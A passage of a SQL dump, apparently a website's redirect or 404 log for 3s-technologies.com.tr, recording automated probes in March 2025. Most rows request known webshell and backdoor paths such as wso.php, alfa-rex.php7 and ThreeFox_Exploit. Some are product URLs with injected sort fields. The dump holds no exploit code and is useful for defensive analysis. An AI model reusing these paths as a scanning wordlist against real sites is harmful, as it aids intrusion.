00:00:00',301),(38251,'https://3s-technologies.com.tr/tr/wp-content/themes/hideo/network.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/hideo/network.php','',2,0,'2025-03-13 23:45:43','0000-00-00 00:00:00',301),(38252,'https://3s-technologies.com.tr/tr/wp-includes/text/about.php',NULL,'https://3s-technologies.com.tr//wp-includes/Text/about.php','',2,0,'2025-03-13 23:45:43','0000-00-00 00:00:00',301),(38253,'https://3s-technologies.com.tr/tr/wp-includes/wp-class.php',NULL,'https://3s-technologies.com.tr//wp-includes/wp-class.php','',2,0,'2025-03-13 23:45:44','0000-00-00 00:00:00',301),(38254,'https://3s-technologies.com.tr/tr/wp-admin/maint/upfile.php',NULL,'https://3s-technologies.com.tr//wp-admin/maint/upfile.php','',2,0,'2025-03-13 23:45:45','0000-00-00 00:00:00',301),(38255,'https://3s-technologies.com.tr/tr/wp-includes/room.php',NULL,'https://3s-technologies.com.tr//wp-includes/room.php','',2,0,'2025-03-13 23:45:46','0000-00-00 00:00:00',301),(38256,'https://3s-technologies.com.tr/tr/defaul.php',NULL,'https://3s-technologies.com.tr//defaul.php','',2,0,'2025-03-13 23:45:46','0000-00-00 00:00:00',301),(38257,'https://3s-technologies.com.tr/tr/wp-includes/rest-api/about.php',NULL,'https://3s-technologies.com.tr//wp-includes/rest-api/about.php','',2,0,'2025-03-13 23:45:47','0000-00-00 00:00:00',301),(38258,'https://3s-technologies.com.tr/tr/repeater.php',NULL,'https://3s-technologies.com.tr//repeater.php','',2,0,'2025-03-13 23:45:48','0000-00-00 00:00:00',301),(38259,'https://3s-technologies.com.tr/tr/njima.php',NULL,'https://3s-technologies.com.tr//Njima.php','',2,0,'2025-03-13 23:45:49','0000-00-00 00:00:00',301),(38260,'https://3s-technologies.com.tr/tr/ticket/vendor/htmlawed/htmlawed/gel4y.php',NULL,'https://3s-technologies.com.tr//ticket/vendor/htmlawed/htmlawed/gel4y.php','',2,0,'2025-03-13 23:45:49','0000-00-00 00:00:00',301),(38261,'https://3s-technologies.com.tr/tr/wp-content/themes/seotheme/db.php?u',NULL,'https://3s-technologies.com.tr//wp-content/themes/seotheme/db.php?u','',2,0,'2025-03-13 23:45:51','0000-00-00 00:00:00',301),(38262,'https://3s-technologies.com.tr/tr/wp-content/plugins/ubh/up.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/ubh/up.php','',2,0,'2025-03-13 23:45:52','0000-00-00 00:00:00',301),(38263,'https://3s-technologies.com.tr/tr/wp-content/themes/pridmag/db.php?u',NULL,'https://3s-technologies.com.tr//wp-content/themes/pridmag/db.php?u','',2,0,'2025-03-13 23:45:52','0000-00-00 00:00:00',301),(38264,'https://3s-technologies.com.tr/tr/wp-content/plugins/pwnd/pwnd.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/pwnd/pwnd.php','',3,0,'2025-03-13 23:45:54','0000-00-00 00:00:00',301),(38265,'https://3s-technologies.com.tr/tr/wp-content/threefox_exploit/index.php?threefox',NULL,'https://3s-technologies.com.tr//wp-content/ThreeFox_Exploit/index.php?threefox','',2,0,'2025-03-13 23:45:55','0000-00-00 00:00:00',301),(38266,'https://3s-technologies.com.tr/tr/test.php',NULL,'https://3s-technologies.com.tr//test.php','',10,0,'2025-03-13 23:45:56','0000-00-00 00:00:00',301),(38267,'https://3s-technologies.com.tr/tr/nexus.php',NULL,'https://3s-technologies.com.tr//Nexus.php','',2,0,'2025-03-13 23:45:56','0000-00-00 00:00:00',301),(38268,'https://3s-technologies.com.tr/tr/wp-admin/maint/wp-damin.php',NULL,'https://3s-technologies.com.tr//wp-admin/maint/wp-damin.php','',2,0,'2025-03-13 23:45:58','0000-00-00 00:00:00',301),(38269,'https://3s-technologies.com.tr/tr/epinyins.php',NULL,'https://3s-technologies.com.tr//epinyins.php','',2,0,'2025-03-13 23:45:59','0000-00-00 00:00:00',301),(38270,'https://3s-technologies.com.tr/tr/.well-known/autoload_classmap.php',NULL,'https://3s-technologies.com.tr//.well-known/autoload_classmap.php','',2,0,'2025-03-13 23:46:00','0000-00-00 00:00:00',301),(38271,'https://3s-technologies.com.tr/tr/wp-content/plugins/pwnd1/pwnd.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/pwnd1/pwnd.php','',2,0,'2025-03-13 23:46:02','0000-00-00 00:00:00',301),(38272,'https://3s-technologies.com.tr/tr/wp-admin/maint/go.php',NULL,'https://3s-technologies.com.tr//wp-admin/maint/go.php','',2,0,'2025-03-13 23:46:04','0000-00-00 00:00:00',301),(38273,'https://3s-technologies.com.tr/tr/wp-blog-footer.php',NULL,'https://3s-technologies.com.tr//wp-blog-footer.php','',2,0,'2025-03-13 23:46:05','0000-00-00 00:00:00',301),(38274,'https://3s-technologies.com.tr/tr/wp-content/plugins/dzs-zoomsounds/1877.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/dzs-zoomsounds/1877.php','',2,0,'2025-03-13 23:46:06','0000-00-00 00:00:00',301),(38275,'https://3s-technologies.com.tr/tr/wp-admin/wso.php',NULL,'https://3s-technologies.com.tr//wp-admin/wso.php','',2,0,'2025-03-13 23:46:07','0000-00-00 00:00:00',301),(38276,'https://3s-technologies.com.tr/tr/wp-content/plugins/sid/sidwso.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/sid/sidwso.php','',2,0,'2025-03-13 23:46:08','0000-00-00 00:00:00',301),(38277,'https://3s-technologies.com.tr/tr/wp-content/plugins/wordpresss3cll/up.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/wordpresss3cll/up.php','',2,0,'2025-03-13 23:46:09','0000-00-00 00:00:00',301),(38278,'https://3s-technologies.com.tr/tr/wp-admin/maint/about.php',NULL,'https://3s-technologies.com.tr//wp-admin/maint/about.php','',2,0,'2025-03-13 23:46:09','0000-00-00 00:00:00',301),(38279,'https://3s-technologies.com.tr/tr/wso112233.php',NULL,'https://3s-technologies.com.tr//wso112233.php','',2,0,'2025-03-13 23:46:10','0000-00-00 00:00:00',301),(38280,'https://3s-technologies.com.tr/tr/wp-content/plugins/royal-ckeditor/admin.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/royal-ckeditor/admin.php','',2,0,'2025-03-13 23:46:11','0000-00-00 00:00:00',301),(38281,'https://3s-technologies.com.tr/tr/wp-content/plugins/core-econ/uph.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/Core-Econ/upH.php','',2,0,'2025-03-13 23:46:12','0000-00-00 00:00:00',301),(38282,'https://3s-technologies.com.tr/tr/default.php',NULL,'https://3s-technologies.com.tr//default.php','',2,0,'2025-03-13 23:46:14','0000-00-00 00:00:00',301),(38283,'https://3s-technologies.com.tr/tr/wp-includes/assets/winnner.php',NULL,'https://3s-technologies.com.tr//wp-includes/assets/winnner.php','',2,0,'2025-03-13 23:46:15','0000-00-00 00:00:00',301),(38284,'https://3s-technologies.com.tr/tr/wp-includes/update.php',NULL,'https://3s-technologies.com.tr//wp-includes/update.php','',2,0,'2025-03-13 23:46:15','0000-00-00 00:00:00',301),(38285,'https://3s-technologies.com.tr/tr/wp-admin/user/about.php',NULL,'https://3s-technologies.com.tr//wp-admin/user/about.php','',2,0,'2025-03-13 23:46:17','0000-00-00 00:00:00',301),(38286,'https://3s-technologies.com.tr/tr/wp-content/plugins/about.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/about.php','',3,0,'2025-03-13 23:46:18','0000-00-00 00:00:00',301),(38287,'https://3s-technologies.com.tr/tr/wp-admin/css/ok.php',NULL,'https://3s-technologies.com.tr//wp-admin/css/OK.php','',2,0,'2025-03-13 23:46:19','0000-00-00 00:00:00',301),(38288,'https://3s-technologies.com.tr/tr/fm1.php',NULL,'https://3s-technologies.com.tr//fm1.php','',2,0,'2025-03-13 23:46:19','0000-00-00 00:00:00',301),(38289,'https://3s-technologies.com.tr/tr/wp-content/plugins/anttt/simple.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/anttt/simple.php','',2,0,'2025-03-13 23:46:20','0000-00-00 00:00:00',301),(38290,'https://3s-technologies.com.tr/tr/xmrlpc.php',NULL,'https://3s-technologies.com.tr//xmrlpc.php','',2,0,'2025-03-13 23:46:21','0000-00-00 00:00:00',301),(38291,'https://3s-technologies.com.tr/tr/file/function.php',NULL,'https://3s-technologies.com.tr//file/function.php','',2,0,'2025-03-13 23:46:22','0000-00-00 00:00:00',301),(38292,'https://3s-technologies.com.tr/tr/amaxx.php',NULL,'https://3s-technologies.com.tr//amaxx.php','',2,0,'2025-03-13 23:46:22','0000-00-00 00:00:00',301),(38293,'https://3s-technologies.com.tr/tr/wp-content/plugins/wpcall-button/button-image.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/wpcall-button/button-image.php','',2,0,'2025-03-13 23:46:23','0000-00-00 00:00:00',301),(38294,'https://3s-technologies.com.tr/tr/wp-content/themes/finley/min.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/finley/min.php','',2,0,'2025-03-13 23:46:24','0000-00-00 00:00:00',301),(38295,'https://3s-technologies.com.tr/tr/alfa-ioxi.php',NULL,'https://3s-technologies.com.tr//alfa-ioxi.php','',2,0,'2025-03-13 23:46:25','0000-00-00 00:00:00',301),(38296,'https://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/ups.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/background-image-cropper/ups.php','',2,0,'2025-03-13 23:46:25','0000-00-00 00:00:00',301),(38297,'https://3s-technologies.com.tr/tr/wp-content/threefox_exploit/threefox.php',NULL,'https://3s-technologies.com.tr//wp-content/ThreeFox_Exploit/threefox.php','',2,0,'2025-03-13 23:46:26','0000-00-00 00:00:00',301),(38298,'https://3s-technologies.com.tr/tr/wp-content/themes/digital-download/up.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/digital-download/up.php','',2,0,'2025-03-13 23:46:27','0000-00-00 00:00:00',301),(38299,'https://3s-technologies.com.tr/tr/bypass1.php',NULL,'https://3s-technologies.com.tr//bypass1.php','',2,0,'2025-03-13 23:46:32','0000-00-00 00:00:00',301),(38300,'https://3s-technologies.com.tr/tr/wp-content/plugins/fighter/ultra.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/fighter/ultra.php','',2,0,'2025-03-13 23:46:33','0000-00-00 00:00:00',301),(38301,'https://3s-technologies.com.tr/tr/wp-content/plugins/fighter/fk.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/fighter/fk.php','',2,0,'2025-03-13 23:46:34','0000-00-00 00:00:00',301),(38302,'https://3s-technologies.com.tr/tr/al.php',NULL,'https://3s-technologies.com.tr//al.php','',2,0,'2025-03-13 23:46:34','0000-00-00 00:00:00',301),(38303,'https://3s-technologies.com.tr/tr/wp-content/uploads/import-export-for-woocommerce/product/import_manual_1737090262.php',NULL,'https://3s-technologies.com.tr//wp-content/uploads/import-export-for-woocommerce/product/import_manual_1737090262.php','',2,0,'2025-03-13 23:46:36','0000-00-00 00:00:00',301),(38304,'https://3s-technologies.com.tr/tr/wp-content/themes/mha/db.php?u',NULL,'https://3s-technologies.com.tr//wp-content/themes/mha/db.php?u','',2,0,'2025-03-13 23:46:37','0000-00-00 00:00:00',301),(38305,'https://3s-technologies.com.tr/tr/wp-content/themes/dikan/db.php?u',NULL,'https://3s-technologies.com.tr//wp-content/themes/dikan/db.php?u','',2,0,'2025-03-13 23:46:38','0000-00-00 00:00:00',301),(38306,'https://3s-technologies.com.tr/tr/wp-admin/includes/moon.php',NULL,'https://3s-technologies.com.tr//wp-admin/includes/moon.php','',2,0,'2025-03-13 23:46:38','0000-00-00 00:00:00',301),(38307,'https://3s-technologies.com.tr/tr/wp-content/plugins/seoxx/asasx.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/seoxx/asasx.php','',2,0,'2025-03-13 23:46:39','0000-00-00 00:00:00',301),(38308,'https://3s-technologies.com.tr/tr/wp-content/bk/index.php',NULL,'https://3s-technologies.com.tr//wp-content/bk/index.php','',2,0,'2025-03-13 23:46:40','0000-00-00 00:00:00',301),(38309,'https://3s-technologies.com.tr/tr/class-db.php',NULL,'https://3s-technologies.com.tr//class-db.php','',2,0,'2025-03-13 23:46:41','0000-00-00 00:00:00',301),(38310,'https://3s-technologies.com.tr/tr/wp-content/class-db.php',NULL,'https://3s-technologies.com.tr//wp-content/class-db.php','',2,0,'2025-03-13 23:46:41','0000-00-00 00:00:00',301),(38311,'https://3s-technologies.com.tr/tr/wp-includes/class-db.php',NULL,'https://3s-technologies.com.tr//wp-includes/class-db.php','',2,0,'2025-03-13 23:46:42','0000-00-00 00:00:00',301),(38312,'https://3s-technologies.com.tr/tr/wp-admin/class-db.php',NULL,'https://3s-technologies.com.tr//wp-admin/class-db.php','',2,0,'2025-03-13 23:46:43','0000-00-00 00:00:00',301),(38313,'https://3s-technologies.com.tr/tr/vendor/htmlawed/htmlawed/htmlawedtest.php',NULL,'https://3s-technologies.com.tr//vendor/htmlawed/htmlawed/htmLawedTest.php','',2,0,'2025-03-13 23:46:44','0000-00-00 00:00:00',301),(38314,'https://3s-technologies.com.tr/tr/modules/mod_webshell/mod_webshell.php',NULL,'https://3s-technologies.com.tr//modules/mod_webshell/mod_webshell.php','',4,0,'2025-03-13 23:46:44','0000-00-00 00:00:00',301),(38315,'https://3s-technologies.com.tr/tr/wp-content/plugins/chosen.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/chosen.php','',2,0,'2025-03-13 23:46:45','0000-00-00 00:00:00',301),(38316,'https://3s-technologies.com.tr/tr/lv.php',NULL,'https://3s-technologies.com.tr//lv.php','',2,0,'2025-03-13 23:46:46','0000-00-00 00:00:00',301),(38317,'https://3s-technologies.com.tr/tr/wp-includes/requests/about.php',NULL,'https://3s-technologies.com.tr//wp-includes/Requests/about.php','',2,0,'2025-03-13 23:46:46','0000-00-00 00:00:00',301),(38318,'https://3s-technologies.com.tr/tr/wp-content/themes/travelscape/json.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/travelscape/json.php','',2,0,'2025-03-13 23:46:48','0000-00-00 00:00:00',301),(38319,'https://3s-technologies.com.tr/tr/contact.php',NULL,'https://3s-technologies.com.tr//contact.php','',2,0,'2025-03-13 23:46:49','0000-00-00 00:00:00',301),(38320,'https://3s-technologies.com.tr/tr/wp-head.php',NULL,'https://3s-technologies.com.tr//wp-head.php','',2,0,'2025-03-13 23:46:49','0000-00-00 00:00:00',301),(38321,'https://3s-technologies.com.tr/tr/alfa-rex.php7',NULL,'https://3s-technologies.com.tr//alfa-rex.php7','',2,0,'2025-03-13 23:46:50','0000-00-00 00:00:00',301),(38322,'https://3s-technologies.com.tr/tr/.tmb/wp-login.php',NULL,'https://3s-technologies.com.tr//.tmb/wp-login.php','',2,0,'2025-03-13 23:46:51','0000-00-00 00:00:00',301),(38323,'https://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-filesystem-base.php',NULL,'https://3s-technologies.com.tr//wp-admin/includes/class-wp-filesystem-base.php','',2,0,'2025-03-13 23:46:53','0000-00-00 00:00:00',301),(38324,'https://3s-technologies.com.tr/tr/wp-content/plugins/simple/simple.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/simple/simple.php','',3,0,'2025-03-13 23:46:53','0000-00-00 00:00:00',301),(38325,'https://3s-technologies.com.tr/tr/ty.php',NULL,'https://3s-technologies.com.tr//ty.php','',2,0,'2025-03-13 23:46:54','0000-00-00 00:00:00',301),(38326,'https://3s-technologies.com.tr/tr/wp-includes/style-engine/about.php',NULL,'https://3s-technologies.com.tr//wp-includes/style-engine/about.php','',2,0,'2025-03-13 23:46:55','0000-00-00 00:00:00',301),(38327,'https://3s-technologies.com.tr/tr/wp-content/plugins/cache/cache.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/Cache/Cache.php','',2,0,'2025-03-13 23:46:56','0000-00-00 00:00:00',301),(38328,'https://3s-technologies.com.tr/tr/users.php',NULL,'https://3s-technologies.com.tr//users.php','',2,0,'2025-03-13 23:46:56','0000-00-00 00:00:00',301),(38329,'https://3s-technologies.com.tr/tr/themes/zmousse/otuz1.php',NULL,'https://3s-technologies.com.tr//themes/zMousse/otuz1.php','',2,0,'2025-03-13 23:46:57','0000-00-00 00:00:00',301),(38330,'https://3s-technologies.com.tr/tr/ga13.php',NULL,'https://3s-technologies.com.tr//GA13.php','',2,0,'2025-03-13 23:46:58','0000-00-00 00:00:00',301),(38331,'https://3s-technologies.com.tr/tr/wp-content/themes/hariko/lib.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/hariko/lib.php','',2,0,'2025-03-13 23:46:58','0000-00-00 00:00:00',301),(38332,'https://3s-technologies.com.tr/tr/wp-content/plugins/wp-help/admin/wp-fclass.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/wp-help/admin/wp-fclass.php','',2,0,'2025-03-13 23:46:59','0000-00-00 00:00:00',301),(38333,'https://3s-technologies.com.tr/tr/wp-apxupx.php',NULL,'https://3s-technologies.com.tr//wp-apxupx.php','',2,0,'2025-03-13 23:47:00','0000-00-00 00:00:00',301),(38334,'https://3s-technologies.com.tr/tr/wp-content/plugins/tunnelforms/lib.php',NULL,'https://3s-technologies.com.tr//wp-content/plugins/tunnelforms/lib.php','',2,0,'2025-03-13 23:47:01','0000-00-00 00:00:00',301),(38335,'https://3s-technologies.com.tr/tr/wp-content/uploads/wpr-addons/forms/b1ack.php',NULL,'https://3s-technologies.com.tr//wp-content/uploads/wpr-addons/forms/b1ack.php','',2,0,'2025-03-13 23:47:01','0000-00-00 00:00:00',301),(38336,'https://3s-technologies.com.tr/tr/wp-includes/certificates/plugins.php',NULL,'https://3s-technologies.com.tr//wp-includes/certificates/plugins.php','',2,0,'2025-03-13 23:47:02','0000-00-00 00:00:00',301),(38337,'https://3s-technologies.com.tr/tr/wp-content/themes/travel/issue.php',NULL,'https://3s-technologies.com.tr//wp-content/themes/travel/issue.php','',2,0,'2025-03-13 23:47:03','0000-00-00 00:00:00',301),(38338,'https://3s-technologies.com.tr/tr/bads.php',NULL,'https://3s-technologies.com.tr//bads.php','',2,0,'2025-03-13 23:47:04','0000-00-00 00:00:00',301),(38339,'https://3s-technologies.com.tr/tr/wp-includes/id3/bads.php',NULL,'https://3s-technologies.com.tr//wp-includes/ID3/bads.php','',2,0,'2025-03-13 23:47:05','0000-00-00 00:00:00',301),(38340,'https://3s-technologies.com.tr/tr/wp-content/bads/index.php?bads',NULL,'https://3s-technologies.com.tr//wp-content/bads/index.php?bads','',2,0,'2025-03-13 23:47:05','0000-00-00 00:00:00',301),(38341,'https://3s-technologies.com.tr/tr/wp-includes/fonts/class-wp-font-library.php',NULL,'https://3s-technologies.com.tr//wp-includes/fonts/class-wp-font-library.php','',2,0,'2025-03-13 23:47:06','0000-00-00 00:00:00',301),(38342,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',16,0,'2025-03-14 02:47:51','0000-00-00 00:00:00',301),(38343,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,ordering',NULL,'','',16,0,'2025-03-14 02:47:55','0000-00-00 00:00:00',301),(38344,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_sku',NULL,'','',18,0,'2025-03-14 02:48:01','0000-00-00 00:00:00',301),(38345,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/cm-602-l-detail',NULL,'','',8,0,'2025-03-14 02:48:03','0000-00-00 00:00:00',301),(38346,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',9,0,'2025-03-14 02:48:04','0000-00-00 00:00:00',301),(38347,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/dirdesc',NULL,'','',18,0,'2025-03-14 02:48:05','0000-00-00 00:00:00',301),(38348,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/mx200lp-3-detail',NULL,'','',9,0,'2025-03-14 02:48:07','0000-00-00 00:00:00',301),(38349,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',9,0,'2025-03-14 02:48:08','0000-00-00 00:00:00',301),(38350,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/npm-detail',NULL,'','',8,0,'2025-03-14 02:48:09','0000-00-00 00:00:00',301),(38351,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-03-14 02:48:14','0000-00-00 00:00:00',301),(38352,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',20,0,'2025-03-14 02:48:15','0000-00-00 00:00:00',301),(38353,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',21,0,'2025-03-14 02:48:16','0000-00-00 00:00:00',301),(38354,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',19,0,'2025-03-14 02:48:22','0000-00-00 00:00:00',301),(38355,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/dirdesc',NULL,'','',22,0,'2025-03-14 02:48:23','0000-00-00 00:00:00',301),(38356,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız',NULL,'','',15,0,'2025-03-14 02:48:26','0000-00-00 00:00:00',301),(38357,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',20,0,'2025-03-14 02:48:27','0000-00-00 00:00:00',301),(38358,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',19,0,'2025-03-14 02:48:30','0000-00-00 00:00:00',301),(38359,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',19,0,'2025-03-14 02:48:31','0000-00-00 00:00:00',301),(38360,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,category_name/dirdesc',NULL,'','',12,0,'2025-03-14 02:48:33','0000-00-00 00:00:00',301),(38361,'http://3s-technologies.com.tr/tr/wp-content/plugins/ioxi/retu.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/ioxi/retu.php','',4,0,'2025-03-14 14:27:53','0000-00-00 00:00:00',301),(38362,'http://3s-technologies.com.tr/tr/kean.php',NULL,'http://3s-technologies.com.tr//kean.php','',4,0,'2025-03-14 14:27:55','0000-00-00 00:00:00',301),(38363,'http://3s-technologies.com.tr/tr/first.php',NULL,'http://3s-technologies.com.tr//first.php','',20,0,'2025-03-14 14:27:56','0000-00-00 00:00:00',301),(38364,'http://3s-technologies.com.tr/tr/wp-content/uploads/2024/01/rxr.php',NULL,'http://3s-technologies.com.tr//wp-content/uploads/2024/01/RxR.php','',4,0,'2025-03-14 14:27:56','0000-00-00 00:00:00',301),(38365,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-title/post-title/index.php',NULL,'http://3s-technologies.com.tr//wp-includes/blocks/post-title/post-title/index.php','',4,0,'2025-03-14 14:27:58','0000-00-00 00:00:00',301),(38366,'http://3s-technologies.com.tr/tr/wp-includes/js/dist/dist/index.php',NULL,'http://3s-technologies.com.tr//wp-includes/js/dist/dist/index.php','',4,0,'2025-03-14 14:27:58','0000-00-00 00:00:00',301),(38367,'http://3s-technologies.com.tr/tr/wp-includes/blocks/page-list/page-list/index.php',NULL,'http://3s-technologies.com.tr//wp-includes/blocks/page-list/page-list/index.php','',4,0,'2025-03-14 14:27:59','0000-00-00 00:00:00',301),(38368,'http://3s-technologies.com.tr/tr/wp-maps.php',NULL,'http://3s-technologies.com.tr//wp-maps.php','',3,0,'2025-03-14 14:28:01','0000-00-00 00:00:00',301),(38369,'http://3s-technologies.com.tr/tr/wp-content/themes/divi/404.php',NULL,'http://3s-technologies.com.tr//wp-content/themes/Divi/404.php','',4,0,'2025-03-14 14:28:02','0000-00-00 00:00:00',301),(38370,'http://3s-technologies.com.tr/tr/heh.php',NULL,'http://3s-technologies.com.tr//heh.php','',7,0,'2025-03-14 14:28:05','0000-00-00 00:00:00',301),(38371,'http://3s-technologies.com.tr/tr/newfile.php',NULL,'http://3s-technologies.com.tr//NewFile.php','',151,0,'2025-03-14 14:28:06','0000-00-00 00:00:00',301),(38372,'http://3s-technologies.com.tr/tr/wp-content/plugins/view-more/ioxi.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/view-more/ioxi.php','',5,0,'2025-03-14 14:28:07','0000-00-00 00:00:00',301),(38373,'http://3s-technologies.com.tr/tr/baxa1.php7',NULL,'http://3s-technologies.com.tr//baxa1.php7','',9,0,'2025-03-14 14:28:08','0000-00-00 00:00:00',301),(38374,'http://3s-technologies.com.tr/tr/wp-content/plugins/erinyani/baxa1.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/erinyani/baxa1.php','',4,0,'2025-03-14 14:28:09','0000-00-00 00:00:00',301),(38375,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoxx/randkeyword.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/seoxx/randkeyword.php','',4,0,'2025-03-14 14:28:10','0000-00-00 00:00:00',301),(38376,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/zmfm.php',NULL,'http://3s-technologies.com.tr//wp-includes/sitemaps/providers/zmFM.php','',9,0,'2025-03-14 14:28:10','0000-00-00 00:00:00',301),(38377,'http://3s-technologies.com.tr/tr/wp-includes/pomo/zmfm.php',NULL,'http://3s-technologies.com.tr//wp-includes/pomo/zmFM.php','',9,0,'2025-03-14 14:28:11','0000-00-00 00:00:00',301),(38378,'http://3s-technologies.com.tr/tr/wp-content/plugins/backup_index.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/backup_index.php','',11,0,'2025-03-14 14:28:12','0000-00-00 00:00:00',301),(38379,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentythree/patterns/index.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentytwentythree/patterns/index.php','',17,0,'2025-03-14 14:28:15','0000-00-00 00:00:00',301),(38380,'http://3s-technologies.com.tr/tr/wp-content/mich-rep.php',NULL,'http://3s-technologies.com.tr//wp-content/mich-REP.php','',3,0,'2025-03-14 14:28:19','0000-00-00 00:00:00',301),(38381,'http://3s-technologies.com.tr/tr/wp-admin/css/go.php',NULL,'http://3s-technologies.com.tr//wp-admin/css/go.php','',19,0,'2025-03-14 14:28:22','0000-00-00 00:00:00',301),(38382,'http://3s-technologies.com.tr/tr/wp-includes/pomo/yellow.php',NULL,'http://3s-technologies.com.tr//wp-includes/pomo/yellow.php','',18,0,'2025-03-14 14:28:23','0000-00-00 00:00:00',301),(38383,'http://3s-technologies.com.tr/tr/.well-known/pki-validation/moon.php',NULL,'http://3s-technologies.com.tr//.well-known/pki-validation/moon.php','',4,0,'2025-03-14 14:29:14','0000-00-00 00:00:00',301),(38384,'http://3s-technologies.com.tr/tr/.well-known/pki-validation/index.php',NULL,'http://3s-technologies.com.tr//.well-known/pki-validation/index.php','',4,0,'2025-03-14 14:29:46','0000-00-00 00:00:00',301),(38385,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/index.php',NULL,'http://3s-technologies.com.tr//wp-admin/css/colors/blue/index.php','',288,0,'2025-03-14 14:30:02','0000-00-00 00:00:00',301),(38386,'http://3s-technologies.com.tr/tr/baxa1.php',NULL,'http://3s-technologies.com.tr//baxa1.php','',29,0,'2025-03-14 14:30:34','0000-00-00 00:00:00',301),(38387,'http://3s-technologies.com.tr/tr/.well-known/pki-validation/about.php',NULL,'http://3s-technologies.com.tr//.well-known/pki-validation/about.php','',4,0,'2025-03-14 14:31:31','0000-00-00 00:00:00',301),(38388,'http://3s-technologies.com.tr/tr/wp-content/threefox_exploit/index.php?threefox',NULL,'http://3s-technologies.com.tr//wp-content/ThreeFox_Exploit/index.php?threefox','',5,0,'2025-03-14 14:31:47','0000-00-00 00:00:00',301),(38389,'http://3s-technologies.com.tr/tr/wp-admin/maint/wp-damin.php',NULL,'http://3s-technologies.com.tr//wp-admin/maint/wp-damin.php','',20,0,'2025-03-14 14:31:50','0000-00-00 00:00:00',301),(38390,'http://3s-technologies.com.tr/tr/wp-content/plugins/pwnd1/pwnd.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/pwnd1/pwnd.php','',4,0,'2025-03-14 14:31:56','0000-00-00 00:00:00',301),(38391,'http://3s-technologies.com.tr/tr/wp-admin/maint/go.php',NULL,'http://3s-technologies.com.tr//wp-admin/maint/go.php','',26,0,'2025-03-14 14:31:58','0000-00-00 00:00:00',301),(38392,'http://3s-technologies.com.tr/tr/wp-blog-footer.php',NULL,'http://3s-technologies.com.tr//wp-blog-footer.php','',5,0,'2025-03-14 14:31:59','0000-00-00 00:00:00',301),(38393,'http://3s-technologies.com.tr/tr/wp-content/plugins/sid/sidwso.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/sid/sidwso.php','',9,0,'2025-03-14 14:32:02','0000-00-00 00:00:00',301),(38394,'http://3s-technologies.com.tr/tr/wp-content/plugins/royal-ckeditor/admin.php',NULL,'http://3s-technologies.com.tr//wp-content/plugins/royal-ckeditor/admin.php','',4,0,'2025-03-14 14:32:05','0000-00-00 00:00:00',301),(38395,'http://3s-technologies.com.tr/tr/wp-includes/update.php',NULL,'http://3s-technologies.com.tr//wp-includes/update.php','',4,0,'2025-03-14 14:32:12','0000-00-00 